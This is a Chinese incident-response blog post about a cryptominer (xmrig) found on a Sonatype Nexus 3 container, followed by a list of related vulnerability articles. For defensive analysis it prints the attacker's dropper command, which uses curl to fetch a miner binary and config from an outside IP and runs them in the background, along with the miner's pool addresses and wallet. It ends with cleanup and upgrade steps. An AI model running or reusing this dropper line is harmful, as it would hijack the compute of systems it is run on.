发现被执行的程序在xmrig在 /var/tmp/目录下 ,脚本文件内容为以下:

curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/22.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;setsid ./xmrig -c config.json &

config.json内容如下:

{

    "algo": "cryptonight",

    "api": {

        "port": ,

        "access-token": null,

        "id": null,

        "worker-id": null,

        "ipv6": false,

        "restricted": true

    },

    "asm": true,

    "autosave": true,

    "av": ,

    "background": true,

    "colors": true,

    "cpu-affinity": null,

    "cpu-priority": ,

    "donate-level": ,

    "huge-pages": true,

    "hw-aes": null,

    "log-file": null,

    "max-cpu-usage": ,

    "pools": [

        {

            "url": "202.144.193.8:80",

            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",

            "pass": "x",

            "rig-id": null,

            "nicehash": false,

            "keepalive": true,

            "variant": -,

            "tls": false,

            "tls-fingerprint": null

        },

        {

            "url": "185.161.70.34:3333",

            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",

            "pass": "x",

            "rig-id": null,

            "nicehash": false,

            "keepalive": true,

            "variant": -,

            "tls": false,

            "tls-fingerprint": null

        },

        {

            "url": "202.144.193.110:3333",

            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",

            "pass": "x",

            "rig-id": null,

            "nicehash": false,

            "keepalive": true,

            "variant": -,

            "tls": false,

            "tls-fingerprint": null

        },

        {

            "url": "205.185.122.99:3333",

            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",

            "pass": "x",

            "rig-id": null,

            "nicehash": false,

            "keepalive": true,

            "variant": -,

            "tls": false,

            "tls-fingerprint": null

        }

    ],

    "print-time": ,

    "retries": ,

    "retry-pause": ,

    "safe": false,

    "threads": {

        "cn": [

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            },

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            }

        ],

        "cn-lite": [

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            },

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            }

        ],

        "cn-heavy": [

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            },

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            }

        ]

    },

    "algo-perf": {

        "cn": 2.0,

        "cn/2": 2.0,

        "cn/msr": 2.0,

        "cn-lite": 2.0,

        "cn-heavy": 2.0

    },

    "calibrate-algo": false,

    "calibrate-algo-time": ,

    "user-agent": null,

    "syslog": false,

    "watch": false

}

还有一个可 执行的程序

xrmrig,此程序会 导致cpu爆满

删除容器/var/tmp/目录下的文件,或者直接删除容器(当心数据丢失)然后把程序升级  ,用docker安装的升级如下:

docker pull docker.io/sonatype/nexus3 //会自动拉取最新版本

docker run -d -p : -p : --name nexus3 -v /root/nexus-data/:/nexus-data/ --restart=always sonatype/nexus3

Sonatype Nexus Repository Manager版本3.14.2访问控制缺失及远程代码执行漏洞的更多相关文章

  1. struts2之高危远程代码执行漏洞,可造成服务器被入侵,下载最新版本进行修复

          Struts2 被发现存在新的高危远程代码执行漏洞,可造成服务器被入侵,只要是Struts2版本 低于 2.3.14.3 全部存在此漏洞.目前官方已经发布了最新的版本进行修复.请将stru ...

  2. vBulletin 5.x 版本通杀远程代码执行漏洞复现

    漏洞介绍 vBulletin中存在一个文件包含问题,可使恶意访问者包含来自 vBulletin 服务器的文件并且执行任意 PHP 代码.未经验证的恶意访问者可通过向index.php发出包含 rout ...

  3. Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞分析和复现

    0x00 漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库.其3.14.0及之前版本中,存在一处基于OrientDB自 ...

  4. Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞复现

    0x00 漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库.其3.14.0及之前版本中,存在一处基于OrientDB自 ...

  5. ThinkPHP5 远程代码执行漏洞被入侵日志,升级最新版本解决

    2018年12月9日,ThinkPHP团队发布了一个补丁更新,修复了一处由于路由解析缺陷导致的代码执行漏洞.该漏洞危害程度非常高,默认环境配置即可导致远程代码执行.经过启明星辰ADLab安全研究员对T ...

  6. Sonatype Nexus Repository Manager修改密码不成功

    nexus修改用户密码时出现Invalid authentication ticket 搜索一下,说会修改密码操作要在15秒内完成 ,于是快速操作,没想到真成功了

  7. Sonatype Nexus Repository Manager清除无用的docker镜像

    1.创建定时任务 2.先run一下看是否能删除无用镜像

  8. ECShop全系列版本远程代码执行漏洞复现

    前言 问题发生在user.php的display函数,模版变量可控,导致注入,配合注入可达到远程代码执行 漏洞分析 0x01-SQL注入 先看user.php $back_act变量来源于HTTP_R ...

  9. 威胁快报|Nexus Repository Manager 3新漏洞已被用于挖矿木马传播,建议用户尽快修复

    背景 近日,阿里云安全监测到watchbog挖矿木马使用新曝光的Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件. 值得注意的是, ...

随机推荐

  1. 查看PostgreSQL正在执行的SQL

    SELECT procpid, START, now() - START AS lap, current_query FROM ( SELECT backendid, pg_stat_get_back ...

  2. 关于go语言的测试相关内容笔记

    其实之前对于测试自己一直比较弱,不管是python的还是go的,关于测试这块并没有非常注重,这次就好好整理一下关于go的测试 单元测试 Go程序主要包含三类测试: 功能测试(test).基准测试(be ...

  3. 我的IntelliJ IDEA 设置

    1.关闭代码折叠 2.设置代码格式 3.函数参数提醒

  4. vue的js文件中获取vue实例

    1.main.js导出vue实例: var vue = new Vue({ el: '#app', router, components: { App }, template: '<App/&g ...

  5. 8款基于Jquery的WEB前端动画特效

    1.超炫酷的30个jQuery按钮悬停动画 按钮插件是最常见的jQuery插件之一,因为它用途广泛,而且配置起来最为方便.今天我们要分享的是30个超炫酷的jQuery悬停按钮动画,当我们将鼠标滑过按钮 ...

  6. [转]Linux下网络常用命令和工具

    转自:http://int32bit.me/2016/05/04/Linux%E5%B8%B8%E7%94%A8%E7%BD%91%E7%BB%9C%E5%B7%A5%E5%85%B7%E6%80%B ...

  7. hdoj:2058

      #include <iostream> #include <cmath> #include <vector> using namespace std; stru ...

  8. CentOS7单独安装Apache Bench压力测试工具

    用于并发测试. 1.安装 # need to run ab,apache portable runtime yum install apr-util # yum install yum-utils # ...

  9. [springBoot系列]--springBoot注解大全[转]

    一.注解(annotations)列表 @SpringBootApplication:包含了@ComponentScan.@Configuration和@EnableAutoConfiguration ...

  10. org.hibernate.InvalidMappingException: Could not parse mapping document from无法创建sessionFactory

    把 "http://www.hibernate.org/dtd/hibernate-mapping-3.0.dtd" 改为 "http://hibernate.sourc ...